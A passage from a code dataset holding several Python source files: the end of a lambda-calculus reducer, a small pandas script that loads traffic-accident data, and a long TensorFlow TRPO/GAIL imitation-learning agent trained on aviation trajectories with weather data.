choice(string):\n if valid_variable(string):\n return variable(string)\n elif valid_abstraction(string):\n return abstraction(string)\n else:\n return expression(string)\n\n\ndef reduce(expression):\n reduced = []\n applied = False\n i = 0\n\n while i < len(expression) and not applied:\n term = expression[i]\n\n # Sub Expression\n if term.type == 'expression':\n reduced.append(term.reduce())\n applied = True\n i += 1\n\n # Abstraction\n elif term.type == 'lambda' and (i+1) < len(expression):\n data = expression[i+1]\n reduced.append(term(data))\n applied = True\n i += 2\n\n else:\n reduced.append(term)\n i += 1\n\n reduced += expression[i:]\n return reduced\n\n\ndef normalise(string):\n reductions = []\n normalised = False\n pre 
= expression(string)\n post = pre\n reductions.append(str(pre))\n\n while not normalised:\n post = pre.reduce()\n reductions.append(str(post))\n\n # Have we normalised the expression?\n if str(post) == str(pre):\n normalised = True\n\n pre = post\n\n return reductions\n\n\ndef valid(func, string):\n try:\n func(string)\n return True\n except:\n return False\n\n\ndef valid_variable(string):\n return valid(variable, string)\n\n\ndef valid_abstraction(string):\n return valid(abstraction, string)\n\n\ndef valid_expression(string):\n return valid(expression, string)\n\n\ndef remove_outer_brackets(string):\n start = 0\n end = len(string) - 1\n if string[start] == '(' and string[-1] == ')':\n partner = partner_bracket(0, string)\n if partner == end:\n return string[1:-1]\n else:\n return string\n else:\n return string\n\n\ndef partner_bracket(i, string):\n count = 1\n j = i\n\n while count > 0:\n j += 1\n if string[j] == '(':\n count += 1\n elif string[j] == ')':\n count -= 1\n\n return j\n","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"31218244","text":"from pandas import Series, DataFrame\r\nf = open(\"TrafficAccident.csv\",\"r\")\r\ndm = f.readline().strip().split(',')[1:]\r\n\r\nframe = DataFrame()\r\nfor line in f:\r\n \r\n x = line.strip().split(',')\r\n s = Series(x[1:], index = dm)\r\n frame[x[0]] = s\r\n \r\n\r\nprint (frame)\r\n\r\nf.close()\r\n","sub_path":"P1.py","file_name":"P1.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"262779235","text":"# from myconfig import myconfig\nfrom myconfig import myconfig\nimport tensorflow as tf\nimport copy\nfrom tensorflow.python.keras.layers import Input, Dense, concatenate, LeakyReLU\nfrom tensorflow.python.keras.models import Model\nfrom tensorflow.python.keras.losses import mean_squared_error\nfrom matplotlib import pyplot as plt\nimport os\nimport numpy as np\nimport pandas as pd\nfrom scipy.ndimage.interpolation import shift\nfrom tensorflow.keras.utils import to_categorical\nfrom collections import deque\n# import warnings\nfrom critic import Critic\nfrom utils import conjugate_gradient, set_from_flat, kl, self_kl, \\\n flat_gradient, get_flat, discount, line_search, gauss_log_prob, visualize, gradient_summary, \\\n unnormalize_action, unnormalize_observation, unnormalize_observation_metar, unnormalize_observation2\nimport random\n\n\n# from cartpole.critic.critic import Critic\n# from cartpole.trpo.utils import conjugate_gradient, set_from_flat, kl, self_kl,\\\n# flat_gradient, get_flat, discount, line_search\n# np.seterr(all='warn')\n# warnings.filterwarnings('error')\n\n# http://rail.eecs.berkeley.edu/deeprlcoursesp17/docs/lec5.pdf\n\n# TensorFlow wizardry\nconfig = tf.ConfigProto()\n\n# Don't pre-allocate memory; allocate as-needed\nconfig.gpu_options.allow_growth = True\n\n# Only allow a total of half the GPU memory to be allocated\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.6\n\n\nclass ClonosEncoder(object):\n\n @staticmethod\n def create_encoder(observation_dimensions, latent_dimensions):\n with tf.name_scope('Encoder'):\n encoder_x = Input(shape=(observation_dimensions+latent_dimensions,), dtype=tf.float64)\n\n l1 = Dense(100, activation='tanh')(encoder_x) #name='dense_6'), activation=tf.keras.layers.LeakyReLU(alpha=0.01)\n l2 = Dense(100, activation='tanh')(l1) 
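# --- Editor's usage sketch for the lambda-calculus helpers above (assuming the
# module is importable as backend): normalise() records every beta-reduction
# step until the expression stops changing.
from backend import normalise

steps = normalise('(\\x.x)y')  # a backslash is rewritten to the λ symbol internally
print(steps)                   # expected: ['(λx.x)y', 'y', 'y'] — normal form 'y'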
#name='dense_7')\n\n out = Dense(latent_dimensions, activation='softmax')(l2) #name='dense_8')\n\n model = Model(inputs=encoder_x, outputs=out)\n\n return model, encoder_x, l1, l2\n\n\nclass Policy(object):\n\n @staticmethod\n def create_policy(observation_dimensions, latent_dimensions, action_dimensions):\n \"\"\"\n Creates the model of the policy.\n :param observation_dimensions: Observations' dimensions.\n :param action_dimensions: Actions' dimensions.\n :return: Model and the Input layer.\n \"\"\"\n with tf.name_scope('Policy'):\n x = Input(shape=(observation_dimensions+latent_dimensions,), dtype=tf.float64)\n\n h = Dense(100, activation='tanh')(x)#, name='Policy/dense_9')(x)\n h1 = Dense(100, activation='tanh')(h)#, name='Policy/dense_10')(h)\n\n out = Dense(action_dimensions)(h1)#, name='Policy/dense_11')(h1)\n\n model = Model(inputs=x, outputs=out)\n\n return model, x, h, h1\n\n\nclass Discriminator(object):\n\n def __init__(self, observation_dimensions=4, action_dimensions=2):\n self.alpha = myconfig['discriminator_alpha']\n self.epochs = myconfig['discriminator_epochs']\n self.sess = tf.Session(config=config)\n\n self.observations_input = Input(shape=(observation_dimensions,), dtype=tf.float64)\n self.actions_input = Input(shape=(action_dimensions,), dtype=tf.float64)\n self.input = concatenate([self.observations_input, self.actions_input])\n\n h1 = Dense(100, activation='tanh')(self.input)\n h2 = Dense(100, activation='tanh')(h1)\n\n self.out = Dense(1)(h2)\n\n self.discriminate = Model(inputs=[self.observations_input, self.actions_input],\n outputs=self.out)\n\n self.log_D = tf.log(tf.nn.sigmoid(self.out))\n\n self.expert_samples_observations = Input(shape=(observation_dimensions,),\n dtype=tf.float64)\n self.expert_samples_actions = Input(shape=(action_dimensions,), dtype=tf.float64)\n self.policy_samples_observations = Input(shape=(observation_dimensions,), dtype=tf.float64)\n self.policy_samples_actions = Input(shape=(action_dimensions,), dtype=tf.float64)\n self.expert_samples_out = self.discriminate([self.expert_samples_observations,\n self.expert_samples_actions])\n self.policy_samples_out = self.discriminate([self.policy_samples_observations,\n self.policy_samples_actions])\n\n self.discriminator = Model(inputs=[self.expert_samples_observations,\n self.expert_samples_actions,\n self.policy_samples_observations,\n self.policy_samples_actions\n ],\n outputs=[self.expert_samples_out,\n self.policy_samples_out])\n\n # self.expert_loss = tf.reduce_mean(tf.logs(tf.ones_like(self.expert_samples_out)-tf.nn.sigmoid(self.expert_samples_out)))\n # self.policy_loss = tf.reduce_mean(tf.logs(tf.nn.sigmoid(self.expert_samples_out)))\n # self.loss = -(self.expert_loss + self.policy_loss)\n self.expert_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=self.expert_samples_out,\n labels=tf.zeros_like(\n self.expert_samples_out))\n self.policy_loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=self.policy_samples_out,\n labels=tf.ones_like(\n self.policy_samples_out))\n self.expert_loss_avg = tf.reduce_mean(self.expert_loss)\n self.policy_loss_avg = tf.reduce_mean(self.policy_loss)\n self.loss = tf.reduce_mean(self.expert_loss) + tf.reduce_mean(self.policy_loss)\n\n # self.predictions = self.discriminate.outputs[0]\n # self.labels = tf.placeholder(tf.float32, shape=(None), name='y')\n # self.loss = tf.nn.sigmoid.cross_entropy_with_logits(self.out,self.labels)\n self.opt = tf.train.AdamOptimizer(self.alpha).minimize(self.loss)\n # self.opt = tf.train.RMSPropOptimizer(self.alpha, 
decay=0.9).minimize(self.loss)\n self.sess.run(tf.global_variables_initializer())\n with open(myconfig['output_dir']+'/disc_train_loss_log.csv', 'w') as disc_train_log:\n disc_train_log.write(\"epoch,total_loss,expert_loss,policy_loss\"+\"\\n\")\n\n\n def get_trainable_weights(self):\n return self.sess.run(\n [self.discriminate.trainable_weights], feed_dict={})[0]\n\n def train(self, expert_samples_observations, expert_samples_actions,\n policy_samples_observations, policy_samples_actions):\n with open(myconfig['output_dir']+'/disc_train_loss_log.csv', 'a') as disc_train_log:\n loss_run = 0\n loss_before_train = 0\n for i in range(self.epochs):\n _, loss_run, expert_loss_run, policy_loss_run = self.sess.run([self.opt, self.loss, self.expert_loss_avg,self.policy_loss_avg],\n feed_dict={\n self.expert_samples_observations:\n expert_samples_observations,\n self.expert_samples_actions:\n expert_samples_actions,\n self.policy_samples_observations:\n policy_samples_observations,\n self.policy_samples_actions:\n policy_samples_actions\n })\n if i == 0:\n loss_before_train = loss_run\n\n disc_train_log.write(str(i) + \",\" + str(loss_run)+\",\" + str(expert_loss_run) + \",\" + str(policy_loss_run)+\"\\n\")\n # print('Discriminator loss:', loss_run)\n # if i % 100 == 0: print(i, \"loss:\", loss_run)\n return loss_before_train, loss_run\n\n def predict(self, samples_observations, samples_actions):\n return self.sess.run(self.log_D,\n feed_dict={self.observations_input: samples_observations,\n self.actions_input: samples_actions})\n\n\n\n\nclass TRPOAgent(object):\n\n def __init__(self, env, observation_dimensions=10, latent_dimensions=3, action_dimensions=3):\n \"\"\"\n Initializes the agent's parameters and constructs the flowgraph.\n :param env: Environment\n :param observation_dimensions: Observations' dimensions.\n :param action_dimensions: Actions' dimensions.\n \"\"\"\n self.latent_list = []\n self.latent_sequence1 = []\n self.latent_sequence_prob = []\n self.encoder_rew = []\n self.encoder_rew_reset = []\n self.counter = 0\n self.counter2 = 0\n self.init = True\n\n self.env = env\n self.observation_dimensions = observation_dimensions\n self.action_dimensions = action_dimensions\n self.latent_dimensions = latent_dimensions\n self.path_size = myconfig['path_size']\n self.mini_batch_size = myconfig['mini_batch_size']\n self.mini_batches = myconfig['mini_batches']\n self.gamma = myconfig['gamma']\n self.lamda = myconfig['lamda']\n self.max_kl = myconfig['max_kl']\n self.total_episodes = 0\n self.logstd = np.float64(myconfig['logstd'])\n self.critic = Critic(observation_dimensions=self.observation_dimensions)\n self.discriminator = Discriminator(observation_dimensions=self.observation_dimensions, action_dimensions=self.action_dimensions)\n # self.replay_buffer = ReplayBuffer()\n self.sess = tf.Session(config=config)\n self.model2, self.encoder_x, self.l1, self.l2 = ClonosEncoder.create_encoder(self.observation_dimensions, self.latent_dimensions)\n self.model, self.x, self.h, self.h1 = Policy.create_policy(self.observation_dimensions, self.latent_dimensions, self.action_dimensions)\n\n visualize(self.model.trainable_weights)\n\n self.episode_history = deque(maxlen=100)\n\n self.advantages_ph = tf.placeholder(tf.float64, shape=None)\n self.actions_ph = tf.placeholder(tf.float64, shape=(None, action_dimensions),)\n self.old_log_prob_ph = tf.placeholder(tf.float64, shape=None)\n self.theta_ph = tf.placeholder(tf.float64, shape=None)\n self.tangent_ph = tf.placeholder(tf.float64, shape=None)\n 
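# --- Editor's sketch: the Discriminator above exposes log(sigmoid(logits)), and the
# agent later uses r(s, a) = -log(D(s, a)) as its surrogate reward. The same quantity,
# computed stably in plain NumPy (softplus of the negated logit):
import numpy as np

def gail_reward(logits):
    # -log(sigmoid(d)) == log(1 + exp(-d)) == logaddexp(0, -d), stable for large |d|
    return np.logaddexp(0.0, -np.asarray(logits, dtype=np.float64))

# Reward grows as the discriminator scores a (state, action) pair closer to the
# expert class (label 0 in the training setup above):
print(gail_reward([-2.0, 0.0, 2.0]))  # approx. [2.127, 0.693, 0.127]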
self.mu_old_ph = tf.placeholder(tf.float64, shape=(None, action_dimensions))\n\n self.encoder_logits = self.model2.outputs[0]\n self.logits = self.model.outputs[0]\n\n #EDW\n self.q = self.encoder_logits\n self.argmax_q = tf.argmax(self.q, axis=1)\n # self.log_q = tf.log(self.argmax_q)\n\n var_list = self.model.trainable_weights\n self.flat_vars = get_flat(var_list)\n self.sff = set_from_flat(self.theta_ph, var_list)\n\n self.step_direction = tf.placeholder(tf.float64, shape=None)\n self.g_sum = gradient_summary(self.step_direction, var_list)\n\n # Compute surrogate.\n self.log_prob = gauss_log_prob(self.logits, self.logstd, self.actions_ph)\n neg_lh_divided = tf.exp(self.log_prob - self.old_log_prob_ph)\n w_neg_lh = neg_lh_divided * self.advantages_ph\n self.surrogate = tf.reduce_mean(w_neg_lh)\n\n kl_op = kl(self.logits, self.logstd, self.mu_old_ph, self.logstd)\n self.losses = [self.surrogate, kl_op]\n\n self.flat_grad = flat_gradient(self.surrogate, var_list)\n # Compute fisher vector product\n self_kl_op = self_kl(self.logits, self.logstd)\n self_kl_flat_grad = flat_gradient(self_kl_op, var_list)\n g_vector_dotproduct = tf.reduce_sum(self_kl_flat_grad * self.tangent_ph)\n # self.self_kl_grad = tf.gradients(self_kl_op, var_list)\n # start = 0\n # tangents = []\n # for var in var_list:\n # end = start+np.prod(var.shape)\n # tangents.append(tf.reshape(tangent_ph[start:end],var.shape))\n # start = end\n # g_vector_product = [tf.reduce_sum(g * t) for (g, t) in zip(\n # self_kl_grad, tangents)]\n self.fvp = flat_gradient(g_vector_dotproduct, var_list)\n self.merged = tf.summary.merge_all()\n self.train_writer = tf.summary.FileWriter(myconfig['log_dir'], self.sess.graph)\n self.sess.run(tf.global_variables_initializer())\n\n def predict(self, samples_observations):\n q_sess, q_arg = self.sess.run([self.q, self.argmax_q], feed_dict={self.encoder_x: samples_observations})\n #print('q: \\n', q_sess)\n #print('q_argmax:\\n', q_arg)\n #print('len_q:', len(q_sess), 'len_q_arg2:', len(q_arg))\n\n return q_sess, q_arg\n\n def __fisher_vector_product(self, g, feed):\n \"\"\"\n Computes fisher vector product H*g using the direct method.\n :param p: Gradient of surrogate g.\n :param feed: Dictionary, feed_dict for tf.placeholders.\n :return: Fisher vector product H*g.\n \"\"\"\n damping = myconfig['fvp_damping']\n feed[self.tangent_ph] = g\n fvp_run = self.sess.run(self.fvp, feed)\n assert fvp_run.shape == g.shape, \"Different shapes. 
fvp vs g\"\n return fvp_run + g * damping\n\n def get_vars(self):\n model2_weights = self.model2.weights\n model_weights = self.model.weights\n return model2_weights, model_weights\n\n def encoder_rewards(self, prob_latents):\n winner = np.argmax(prob_latents)\n encoder_reward = np.log(prob_latents[winner])\n #print('r:',encoder_reward)\n self.encoder_rew.append([encoder_reward])\n #array = np.asarray(self.encoder_rew[:])\n\n def one_hot_encoding(self, x):\n # print('OneHotEncoding...')\n argmax = np.argmax(x)\n encoded = to_categorical(argmax, num_classes=5)\n # print('enc:', encoded)\n return encoded.tolist(), argmax\n\n def test_one_hot_encoding(self, x):\n # print('OneHotEncoding...')\n argmax = np.argmax(x)\n self.plot_test_latent_var.append(argmax)\n encoded = to_categorical(argmax, num_classes=5)\n # print('enc:', encoded)\n return encoded.tolist(), argmax\n\n def act(self, observation, latent_seq): # , latent):\n global global_concat\n global obs_matrix\n\n #print('self.counter = ', self.counter)\n decoder_input = np.concatenate((np.asarray(observation), latent_seq[self.counter]))\n obs_matrix = decoder_input\n mu = self.sess.run(self.logits, feed_dict={self.x: [decoder_input]})[0]\n\n act = mu + self.logstd * np.random.randn(self.action_dimensions)\n self.counter += 1\n\n return act, mu # , log_q #m2\n\n def init_encoder(self, observation):\n #init_latent = [1., 0., 0.]\n init_latent = [1., 0., 0., 0., 0.]\n init_latent = np.asarray(init_latent)\n enc_input = np.concatenate((np.asarray(observation), init_latent))\n # print('obs_l:', enc_input)\n mu2 = self.sess.run(self.encoder_logits, feed_dict={self.encoder_x: [enc_input]})[0]\n latent_prob = np.asarray(mu2)\n latent, arg = self.test_one_hot_encoding(latent_prob)\n\n decoder_input = np.concatenate((np.asarray(observation), latent))\n return decoder_input, latent, arg\n\n def new_encoder(self, observation, latent_new):\n global global_concat_test\n\n if self.init == True:\n enc_input_n = np.concatenate((np.asarray(observation), latent_new))\n # print('obs_l:',enc_input_n)\n else:\n enc_input_n = np.concatenate((np.asarray(observation), global_concat_test))\n # print('obs_l:', enc_input_n)\n mu2 = self.sess.run(self.encoder_logits, feed_dict={self.encoder_x: [enc_input_n]})[0]\n\n latent_prob = np.asarray(mu2)\n latent_new, arg = self.test_one_hot_encoding(latent_prob)\n\n # array, shape = self.latent_sequence(mu2)\n\n # one_hot_enc = self.keras_oneHotEncoder(array, shape)\n\n global_concat_test = latent_new\n decoder_input = np.concatenate((np.asarray(observation), latent_new))\n return decoder_input, latent_new, arg\n\n def act_test(self, decoder_input):#, latent):\n mu = self.sess.run(self.logits, feed_dict={self.x: [decoder_input]})[0]\n act = mu\n return act\n\n def plot_vae_test(self, ploti, latent_var, e, savepath):\n ploti = np.asarray(ploti)\n latent_var = np.asarray(latent_var)\n ploti_size = ploti.size\n latent_var_size = latent_var.size\n e = np.asarray(e)\n\n ploti = ploti[:ploti_size].copy()\n save_path = os.getcwd() + savepath.format(e)#'/VAE/results_gumbel_softmax/plot/aviation/epoch{}_aviation_latents.png'\n pred_context = latent_var[:ploti_size].copy()\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(1, 1, 1)\n # ax.scatter(ploti, pred_context, c='r', marker='X')\n ax.plot(ploti, pred_context)\n plt.xlabel(\"TimeSteps\")\n # plt.xticks([0, 1000 ,3000, 5000, 7000, 9000, 9500, 10000])\n # naming the y axis\n plt.ylabel(\"Latent Vars\")\n # giving a title to my graph\n plt.title(\"Aviation Enriched - 
Barcelona to Madrid\")\n plt.savefig(save_path, bbox_inches='tight')\n plt.show()\n\n def run(self, episode_num, vae=False, bcloning=False, fname='0%_validate'):\n if bcloning:\n out_file = myconfig['output_dir']+'/exp'+str(myconfig['exp'])+'_'+fname+'_bcloning_results.csv'\n action_out_file = myconfig['output_dir']+'/exp'+str(myconfig['exp'])+'_'+fname+'_actions_bcloning_results.csv'\n elif vae:\n out_file = '../../../VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/0_VAE_results-Metar(3modes).csv'\n action_out_file = '../../../VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/0_actions_VAE_results-Metar(3modes).csv'\n\n enc_saver = tf.train.Saver(self.model2.weights)\n enc_saver.restore(self.sess,\"VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/encoder/encoder_model_e2000.ckpt\") # run2(batch-32-modes3)\n saver = tf.train.Saver(self.model.weights)\n saver.restore(self.sess,\"VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/decoder/decoder_model_e2000.ckpt\") # run2(batch-32-modes3)\n\n with open(out_file, 'w') as results, open(action_out_file, 'w') as action_results:\n results.write(\"episode,longitude,latitude,altitude,timestamp,Pressure_surface,\"\n \"Relative_humidity_isobaric,Temperature_isobaric,Wind_speed_gust_surface,\"\n \"u-component_of_wind_isobaric,v-component_of_wind_isobaric,drct,sknt,alti,vsby,gust,mode\" +\n \"\\n\")\n action_results.write(\"episode,dlon,dlat,dalt\\n\")\n\n actions = []\n obs = []\n discounted_rewards = []\n total_rewards = []\n print('Episodes,Reward')\n self.init = True\n\n for i_episode in range(episode_num):\n self.counter2 = 0\n self.plot_test_latent_var = []\n self.plot_i_test = []\n steps = 0\n r_i = []\n norm_observation, observation = self.env.reset()\n obs_unormalized = unnormalize_observation_metar(observation)\n #print('obs:', observation)\n dec_input1, latent_init, arg = self.init_encoder(observation)\n\n line = \"\"\n for ob in obs_unormalized:\n line += \",\" + str(ob)\n line += \",\" + str(arg)\n results.write(str(i_episode) + line + \"\\n\")\n\n total_reward = 0\n\n for t in range(1000):\n if self.init:\n #print('latent:', latent_init)\n #print('dec_input:', dec_input1)\n obs.append(dec_input1)\n action = self.act_test(dec_input1)\n action = action.tolist()\n else:\n obs.append(dec_input2)\n action = self.act_test(dec_input2)\n action = action.tolist()\n\n self.counter2 += 1\n\n norm_observation2, observation2, reward, done = self.env.step(action, t)\n # print('obs2:',observation2)\n\n if self.init:\n dec_input2, latent, arg = self.new_encoder(observation2, latent_init)\n # print('latent:',latent)\n # print('dec_in2:',dec_input2)\n else:\n dec_input2, latent, arg = self.new_encoder(observation2, latent)\n # print('latent_2:',latent)\n # print('dec_in2_2:',dec_input2)\n\n steps += 1\n r_i.append(reward)\n actions.append(action)\n total_reward += reward\n action = unnormalize_action(action)\n obs_unormalized2 = unnormalize_observation_metar(observation2)\n\n self.plot_i_test.append(t)\n self.init = False\n if t % 100 == 0:\n print(\"%i/%i\" % (t + 100, 1000))\n if t >= 1000 or done:\n # if done:\n # print('')\n # exit(0)\n # continue\n\n np1 = np.asarray(self.plot_i_test)\n np2 = np.asarray(self.plot_test_latent_var)\n print('np1_s:', np1.size)\n print('np2_s:', np2.size)\n #self.plot_vae_test(self.plot_i_test, self.plot_test_latent_var, i_episode)\n break\n else:\n line = \"\"\n for ob in obs_unormalized2:\n line += \",\" 
+ str(ob)\n line += \",\" + str(arg)\n results.write(str(i_episode) + line + \"\\n\")\n action_results.write(\n str(i_episode) + \",\" + str(action[0]) + \",\" + str(action[1]) + \",\" + str(action[2]) + \"\\n\")\n\n print('{0},{1}'.format(i_episode, total_reward))\n # exit(0)\n discounted_rewards.extend(discount(r_i, 0.995))\n total_rewards.append(total_reward)\n\n # self.env.close()\n # self.sess.close()\n return actions, obs, discounted_rewards, total_rewards\n else:\n out_file = myconfig['output_dir']+'/exp'+str(myconfig['exp'])+'_'+fname+'_D-Info_GAIL_results(Metar-5modes).csv'\n action_out_file = myconfig['output_dir'] + '/exp'+str(myconfig['exp'])+'_'+fname+'_D-Info_GAIL_actions_results(Metar-5modes).csv'\n\n enc_saver = tf.train.Saver(self.model2.weights)\n enc_saver.restore(self.sess, \"VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/encoder/encoder_model_e2000.ckpt\") # run2(batch-32-modes3)\n saver = tf.train.Saver(self.model.weights)\n saver.restore(self.sess, myconfig['output_dir']+'output/exp'+myconfig['exp']+\"model.ckpt\")\n\n with open(out_file, 'w') as results, open(action_out_file, 'w') as action_results:\n results.write(\"episode,longitude,latitude,altitude,timestamp,Pressure_surface,\"\n \"Relative_humidity_isobaric,Temperature_isobaric,Wind_speed_gust_surface,\"\n \"u-component_of_wind_isobaric,v-component_of_wind_isobaric,drct,sknt,alti,vsby,gust,mode\" +\n \"\\n\")\n action_results.write(\"episode,dlon,dlat,dalt\\n\")\n\n actions = []\n obs = []\n i = []\n discounted_rewards = []\n total_rewards = []\n print('Episodes,Reward')\n self.init = True\n\n for i_episode in range(episode_num):\n self.counter2 = 0\n self.plot_test_latent_var = []\n self.plot_i_test = []\n steps = 0\n r_i = []\n norm_observation, observation = self.env.reset()\n obs_unormalized = unnormalize_observation_metar(observation)\n #print('obs:', observation)\n dec_input1, latent_init, arg = self.init_encoder(observation)\n\n line = \"\"\n for ob in obs_unormalized:\n line += \",\" + str(ob)\n line += \",\" + str(arg)\n results.write(str(i_episode) + line + \"\\n\")\n\n total_reward = 0\n\n for t in range(1000):\n if self.init:\n #print('latent:', latent_init)\n #print('dec_input:', dec_input1)\n obs.append(dec_input1)\n action = self.act_test(dec_input1)\n action = action.tolist()\n else:\n obs.append(dec_input2)\n action = self.act_test(dec_input2)\n action = action.tolist()\n\n self.counter2 += 1\n\n norm_observation2, observation2, reward, done = self.env.step(action, t)\n # print('obs2:',observation2)\n\n if self.init:\n dec_input2, latent, arg = self.new_encoder(observation2, latent_init)\n # print('latent:',latent)\n # print('dec_in2:',dec_input2)\n else:\n dec_input2, latent, arg = self.new_encoder(observation2, latent)\n # print('latent_2:',latent)\n # print('dec_in2_2:',dec_input2)\n\n steps += 1\n r_i.append(reward)\n actions.append(action)\n total_reward += reward\n action = unnormalize_action(action)\n obs_unormalized2 = unnormalize_observation_metar(observation2)\n\n self.plot_i_test.append(t)\n self.init = False\n if t % 100 == 0:\n print(\"%i/%i\" % (t + 100, 1000))\n if t >= 1000 or done:\n # if done:\n # print('')\n # exit(0)\n # continue\n\n np1 = np.asarray(self.plot_i_test)\n np2 = np.asarray(self.plot_test_latent_var)\n print('np1_s:', np1.size)\n print('np2_s:', np2.size)\n self.plot_vae_test(self.plot_i_test, self.plot_test_latent_var, i_episode, '/VAE/results_gumbel_softmax/plot/aviation/epoch{}_aviation_latents.png')\n break\n else:\n line = 
\"\"\n for ob in obs_unormalized2:\n line += \",\" + str(ob)\n line += \",\" + str(arg)\n results.write(str(i_episode) + line + \"\\n\")\n action_results.write(\n str(i_episode) + \",\" + str(action[0]) + \",\" + str(action[1]) + \",\" + str(action[2]) + \"\\n\")\n\n print('{0},{1}'.format(i_episode, total_reward))\n # exit(0)\n discounted_rewards.extend(discount(r_i, 0.995))\n total_rewards.append(total_reward)\n\n # self.env.close()\n # self.sess.close()\n return actions, obs, discounted_rewards, total_rewards\n\n def rollout(self, mini_batch, latent_sequence_np):\n not_enough_samples = True\n batch_actions = []\n batch_observations = []\n batch_observations_lat = []\n batch_total_env_rewards = []\n log_observations = []\n log_actions = []\n episode = 0\n samples = 0\n global index\n global index2\n global counter_idx\n global indexing_csv\n\n if mini_batch == 0:\n indexing_csv = pd.read_csv('../../../aviation-indexing.csv')\n indexing_csv = np.asarray(indexing_csv).tolist()\n #indexing_csv = indexing_csv.tolist()\n\n index = 0\n index2 = indexing_csv[0][0]\n #print('index2:', index2)\n counter_idx = 0\n\n while not_enough_samples:\n episode += 1\n self.total_episodes += 1\n actions = []\n observations = []\n observations_lat = []\n raw_observation, observation = self.env.reset()\n total_env_reward = 0\n #print('index:', index, 'index2:', index2)\n latent_sequence = latent_sequence_np[index:index2]\n #print(latent_sequence)\n seq_end = len(latent_sequence)\n #print('seq_len:', seq_end)\n\n for t in range(self.path_size):\n #if (t>0):\n # print('self.counter:', self.counter, 'done:', done, 'seq_size:', seq_end)\n action, _ = self.act(observation, latent_sequence)\n action = action.tolist()\n observation_lat = obs_matrix.tolist()\n observations.append(observation)\n observations_lat.append(observation_lat)\n\n if mini_batch % 100 == 0:\n #log_observation = copy.deepcopy(raw_observation)\n #log_observation.append(episode)\n log_observation = observation_lat + [episode]\n log_observations.append(log_observation)\n log_action = copy.deepcopy(action)\n log_action = np.append(log_action, episode)\n log_actions.append(log_action)\n\n raw_observation, observation, reward_env, done = self.env.step(action, t)\n\n total_env_reward += reward_env\n\n actions.append(action)\n\n if t % 100 == 0:\n #print(\"%i/%i\" % (t + 100, self.path_size))\n continue\n if (self.counter == seq_end) or done:\n # print('DONE2')\n # print('timestep:', t)\n self.counter = 0\n counter_idx += 1\n index = index2\n index2 += indexing_csv[counter_idx][0]\n if (index2 >= 327071):\n index = 0\n index2 = indexing_csv[0][0]\n counter_idx = 0\n break\n\n samples += len(actions)\n batch_observations.append(observations)\n batch_observations_lat.append(observations_lat)\n batch_actions.append(actions)\n batch_total_env_rewards.append(total_env_reward)\n if samples >= self.mini_batch_size:\n not_enough_samples = False\n self.counter = 0\n\n if mini_batch % 100 == 0:\n np.savetxt(myconfig['exp']+'_'+str(mini_batch)+\"_observation_log.csv\", np.asarray(log_observations)\n , delimiter=',', header='longitude,latitude,altitude,timestamp,'+\n 'Pressure_surface,Relative_humidity_isobaric,'+\n 'Temperature_isobaric,Wind_speed_gust_surface,'+\n 'u-component_of_wind_isobaric,'+\n 'v-component_of_wind_isobaric,'+\n 'drct,sknt,alti,vsby,gust,'+'latent1,latent2,latent3,episode'\n , comments='')\n np.savetxt(myconfig['exp']+'_'+str(mini_batch) + \"_action_log.csv\", np.asarray(log_actions),\n delimiter=',', header='dlon,dlat,dalt,episode', 
comments='')\n\n return batch_observations_lat, batch_observations, batch_actions, batch_total_env_rewards\n\n def run_clonos(self, observation, init_latent):\n print('Running.. Encoder Clone')\n global global_concat_test1\n state = 0\n latent_counter = 1\n latent_flag = True\n init_latent = np.asarray(init_latent)\n while state < 327072:\n #print('state:', state)\n #if (latent_counter % 1000 == 0 or latent_counter == 1):\n if (latent_counter == 1):\n latent_flag = True\n else:\n latent_flag = False\n # print('counter:', counter, 'flag:', latent_flag)\n\n if (latent_flag == True):\n enc_input = np.concatenate((np.asarray(observation[state]), init_latent))\n else:\n enc_input = np.concatenate((np.asarray(observation[state]), global_concat_test1))\n\n latent_prob = self.sess.run(self.encoder_logits, feed_dict={self.encoder_x: [enc_input]})[0]\n self.latent_sequence_prob.append(latent_prob)\n latent_prob = np.asarray(latent_prob)\n latent_new, argmax = self.one_hot_encoding(latent_prob)\n self.latent_sequence1.append(latent_new)\n sequence_prob = self.latent_sequence_prob\n sequence = self.latent_sequence1\n #print(latent_new)\n #print(sequence_prob[state])\n #print(sequence[state])\n # print(sequence)\n global_concat_test1 = latent_new\n state += 1\n latent_counter += 1\n self.latent_sequence_list = copy.deepcopy(self.latent_sequence1)\n np_arr_prob = np.asarray(self.latent_sequence_prob)\n np_arr = np.asarray(self.latent_sequence1)\n print(np_arr_prob.shape)\n print(np_arr.shape)\n print('Encoder Clone finished, mode sequences were created successfully!')\n #latent_sequence_prob_pd = pd.DataFrame(self.latent_sequence_prob, columns=['latent1', 'latent2', 'latent3'])\n #latent_sequence_pd = pd.DataFrame(self.latent_sequence1, columns=['latent1', 'latent2', 'latent3'])\n #latent_sequence_prob_pd.to_csv('./expert_data/latent_sequence_prob.csv', index=False)\n #latent_sequence_pd.to_csv('./expert_data/latent_sequence.csv', index=False)\n\n return np_arr_prob, np_arr\n\n def train(self, expert_observations, expert_actions):\n \"\"\"\n Trains the agent.\n :return: void\n \"\"\"\n\n encoder_saver = tf.train.Saver(self.model2.weights)\n encoder_saver.restore(self.sess,\"./VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/encoder/encoder_model_e2000.ckpt\")\n saver = tf.train.Saver(self.model.weights)\n # saver.restore(self.sess, \"./checkpoint/bcloning.ckpt\")\n saver.restore(self.sess, \"./VAE/results_gumbel_softmax/checkpoint/run8-enriched_Metar(5modes)/trpo_plugins/decoder/decoder_model_e2000.ckpt\")\n discriminator_saver = 